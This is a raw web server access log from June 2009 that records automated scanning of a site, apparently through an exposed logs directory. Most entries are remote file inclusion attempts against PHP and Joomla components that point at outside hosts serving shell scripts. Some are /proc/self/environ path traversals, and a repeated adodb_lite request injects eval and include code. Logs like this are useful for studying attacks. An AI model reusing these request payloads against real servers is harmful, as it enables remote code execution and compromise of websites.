89.107.224.138 - - [06/Jun/2009:03:20:40 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:03:20:50 -0400] "GET /logs/error_log.Q109051800%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:03:20:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.107.224.138 - - [06/Jun/2009:03:23:09 -0400] "GET /logs/access_log.Q109051600//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
89.107.224.138 - - [06/Jun/2009:03:23:18 -0400] "GET /logs/access_log.Q109051800//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
66.249.71.14 - - [06/Jun/2009:03:23:35 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [06/Jun/2009:03:23:35 -0400] "GET /logs/access_log.Q109012600 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [06/Jun/2009:03:25:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [06/Jun/2009:03:26:19 -0400] "GET /logs/access_log.Q109052500/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:03:26:49 -0400] "GET /logs/access_log.Q109052300/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.122.39.99 - - [06/Jun/2009:03:26:49 -0400] "GET /logs/access_log.Q109050300/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 271 "-" "Mozilla/4.61 [en] (OS/2; U)"
222.122.39.99 - - [06/Jun/2009:03:26:49 -0400] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 244 "-" "Mozilla/4.61 [en] (OS/2; U)"
222.122.39.99 - - [06/Jun/2009:03:26:50 -0400] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 249 "-" "Mozilla/4.61 [en] (OS/2; U)"
222.122.39.99 - - [06/Jun/2009:03:26:50 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
222.122.39.99 - - [06/Jun/2009:03:26:50 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
222.122.39.99 - - [06/Jun/2009:03:26:50 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
222.122.39.99 - - [06/Jun/2009:03:26:51 -0400] "GET /logs/access_log.Q109050300/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 271 "-" "XXXXXX"
222.122.39.99 - - [06/Jun/2009:03:26:51 -0400] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 244 "-" "XXXXXX"
222.122.39.99 - - [06/Jun/2009:03:26:51 -0400] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 249 "-" "XXXXXX"
222.122.39.99 - - [06/Jun/2009:03:26:51 -0400] "GET /logs/access_log.Q109050300/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 271 "-" "XXXXXX"
222.122.39.99 - - [06/Jun/2009:03:26:51 -0400] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 244 "-" "XXXXXX"
222.122.39.99 - - [06/Jun/2009:03:26:51 -0400] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 249 "-" "XXXXXX"
122.153.212.195 - - [06/Jun/2009:03:27:07 -0400] "GET /logs/access_log.Q109051700/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
122.153.212.195 - - [06/Jun/2009:03:27:08 -0400] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
122.153.212.195 - - [06/Jun/2009:03:27:08 -0400] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
122.153.212.195 - - [06/Jun/2009:03:28:13 -0400] "GET /logs/access_log.Q109053100/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
218.145.31.131 - - [06/Jun/2009:03:28:59 -0400] "GET /index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:03:28:59 -0400] "GET /logs/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:03:29:00 -0400] "GET /logs/access_log.Q109052500/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.122.39.99 - - [06/Jun/2009:03:29:27 -0400] "GET /logs/access_log.Q109053100/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
222.122.39.99 - - [06/Jun/2009:03:29:27 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.122.39.99 - - [06/Jun/2009:03:29:28 -0400] "GET /logs/access_log.Q109053100/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 271 "-" "XXXXXX"
222.122.39.99 - - [06/Jun/2009:03:29:28 -0400] "GET /logs/access_log.Q109053100/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 271 "-" "XXXXXX"
218.145.31.131 - - [06/Jun/2009:03:30:36 -0400] "GET /logs/access_log.Q109052300/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:03:31:12 -0400] "GET /logs/error_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:03:31:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.143.47.76 - - [06/Jun/2009:03:32:21 -0400] "GET /?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
78.143.47.76 - - [06/Jun/2009:03:32:21 -0400] "GET /logs/?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 200 4366 "-" "Mozilla/5.0"
78.143.47.76 - - [06/Jun/2009:03:32:22 -0400] "GET /logs/access_log.Q109052100%20%20/?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jun/2009:03:33:07 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jun/2009:03:33:07 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.122.160.145 - - [06/Jun/2009:03:34:31 -0400] "GET /logs/access_log.Q109051000/lostpasswd.php?env[include_prefix]=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
222.122.160.145 - - [06/Jun/2009:03:34:31 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
222.122.160.145 - - [06/Jun/2009:03:34:31 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
70.85.249.226 - - [06/Jun/2009:03:34:47 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
70.85.249.226 - - [06/Jun/2009:03:34:47 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
70.85.249.226 - - [06/Jun/2009:03:34:52 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.122.160.145 - - [06/Jun/2009:03:35:31 -0400] "GET /logs/access_log.Q109052900/lostpasswd.php?env[include_prefix]=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
78.143.47.76 - - [06/Jun/2009:03:35:51 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.236.47.188 - - [06/Jun/2009:03:36:40 -0400] "GET /logs/access_log.Q109051000/lostpasswd.php?env[include_prefix]=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 239 "-" "libwww-perl/5.65"
222.236.47.188 - - [06/Jun/2009:03:36:40 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
222.236.47.188 - - [06/Jun/2009:03:36:40 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 217 "-" "libwww-perl/5.65"
209.59.12.99 - - [06/Jun/2009:03:36:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
119.93.90.155 - - [06/Jun/2009:03:36:52 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.147.29.190 - - [06/Jun/2009:03:36:53 -0400] "GET /logs/errors.php?error=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.29.190 - - [06/Jun/2009:03:36:53 -0400] "GET /logs/access_log.Q109051800%20%20/errors.php?error=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [06/Jun/2009:03:36:57 -0400] "GET /errors.php?error=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
70.85.249.226 - - [06/Jun/2009:03:37:04 -0400] "GET /logs/access_log.Q109051100%20%20//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:03:37:12 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:03:37:12 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:03:37:12 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
217.147.29.190 - - [06/Jun/2009:03:37:33 -0400] "GET /logs/access_log.Q109050700%20%20/errors.php?error=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.236.47.188 - - [06/Jun/2009:03:38:03 -0400] "GET /logs/access_log.Q109052900/lostpasswd.php?env[include_prefix]=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 239 "-" "libwww-perl/5.65"
74.6.8.112 - - [06/Jun/2009:03:38:06 -0400] "GET /logs/error_log.Q109021700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
70.38.54.140 - - [06/Jun/2009:03:38:53 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:03:39:16 -0400] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:03:39:16 -0400] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:03:39:16 -0400] "GET /logs/error_log.Q109042700%20%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:03:39:43 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:03:39:43 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:03:39:43 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:03:39:52 -0400] "GET /logs/error_log.Q108071100%20%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:03:40:23 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:03:40:57 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:03:41:12 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:03:41:41 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:03:41:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.254.243.197 - - [06/Jun/2009:03:42:13 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:03:46:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.30.80 - - [06/Jun/2009:03:46:57 -0400] "GET /logs/error_log.Q109042700//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
124.0.73.2 - - [06/Jun/2009:03:47:08 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
124.0.73.2 - - [06/Jun/2009:03:47:08 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
124.0.73.2 - - [06/Jun/2009:03:47:08 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
124.0.73.2 - - [06/Jun/2009:03:48:01 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:49:51 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:49:51 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:49:51 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:49:52 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:49:52 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:49:52 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:49:59 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:49:59 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:49:59 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:50:06 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:50:06 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:50:06 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:50:06 -0400] "GET /logs/access_log.Q109053100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:50:07 -0400] "GET /logs/access_log.Q109053100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:50:09 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:50:09 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:50:09 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:50:16 -0400] "GET /logs/access_log.Q109053100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:50:22 -0400] "GET /logs/access_log.Q109053100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:50:23 -0400] "GET /logs/access_log.Q109053100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:03:51:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.191.102.117 - - [06/Jun/2009:03:52:12 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:52:12 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:52:12 -0400] "GET /logs/access_log.Q109052900%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:52:24 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.191.102.117 - - [06/Jun/2009:03:52:24 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
